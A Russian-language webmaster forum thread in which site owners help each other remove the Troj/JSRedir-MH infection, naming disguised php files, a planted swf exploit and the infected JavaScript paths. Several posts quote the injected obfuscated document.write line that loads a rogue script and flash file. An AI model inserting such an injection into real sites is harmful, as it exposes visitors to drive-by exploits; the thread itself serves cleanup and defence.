- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году Одноклассники пресекли более 9 млн подозрительных входов в учетные записи
И выявили более 7 млн подозрительных пользователей
Оксана Мамчуева
Как удалить плохие SEO-ссылки и очистить ссылочную массу сайта
Применяем отклонение ссылок
Сервис Rookee
Troj/JSRedir-MH данный вирус также создает несколько php файлов, у меня они находились в папке с вирусным js и в соседних папках.
Еще стоит обратить внимание на тот swf файл, путь к которому зашифрован в скрипте.
И собственно не забыть удалить этот swf файл.
На хабре писали как дешифрировать http://habrahabr.ru/post/196882/
Спасибо, swf файл удалил, нашёл просто поиском по шаблону всех файлов с таким расширением, их у нас не так и много, "левый" сразу видно.
Troj/JSRedir-MH данный вирус также создает несколько php файлов, у меня они находились в папке с вирусным js и в соседних папках.
То же самое. Кстати их у меня легко нашёл на скачанном бэкапе вебовский cureit. Они лежали в папках с картинками, и имена взяли с одной из картинок в этих папках, только с расширением php. Вот так обзывались: gradient2b.php и no_avatar17.php.
Вирусописатели на славу постарались )
Руки бы им по отрывать😡
Доброго дня!
Troj/JSRedir-MH в корне сайта
380точкаby
может кто подскажет где этот гребаный js.
Спасибо.
В конце /js/slide.js втавка
document.write("<scr"+"ipt src='/admin/media/js/jquery.js'><"+"/script>");там скрипт который всавляет флешку /admin/media/images/forward_enabled.swf
Доброго дня!
Troj/JSRedir-MH в корне сайта
380точкаby
может кто подскажет где этот гребаный js.
Спасибо.
Это все вы удаляете последствия, но не причину, вам обязательно нужно проверить ваш рабочий код движка.
Народ помогите... На днях подцепил это чудо и не могу его отыскать😡 Посмотрите на сайте:intercon(точка)in(точка)ua Зарание благодарен
В конце /js/slide.js втавка
document.write("<scr"+"ipt src='/admin/media/js/jquery.js'><"+"/script>");там скрипт который всавляет флешку /admin/media/images/forward_enabled.swf
Спасибо, за подсказу, во флехе Exploit.SWF.254 зашит.
Это все вы удаляете последствия, но не причину, вам обязательно нужно проверить ваш рабочий код движка.
Как это сделать?
Народ помогите... На днях подцепил это чудо и не могу его отыскать😡 Посмотрите на сайте:intercon(точка)in(точка)ua Зарание благодарен
Вот инструкция по этому вирусу - http://www.w2b.com.ua/audit/552-kak-udalit-virus-trojjsredir-mh-s-sajta.html
в Вашем конктретном случае то вирус с s5_dropdown файла начинается ☝
если сами не разберетесь, то обращайтесь в skype: w2b.kz или на мейл - support@w2b.kz , сделаем за 25$/200грн/800руб за 2-72 часа вернетесь в выдачу Яндекса нормальными.
gipnoz, в самом конце начиная с document.write /modules/mod_virtuemart_s5_dropdown_cart/s5_dropdown/s5_dropdown.js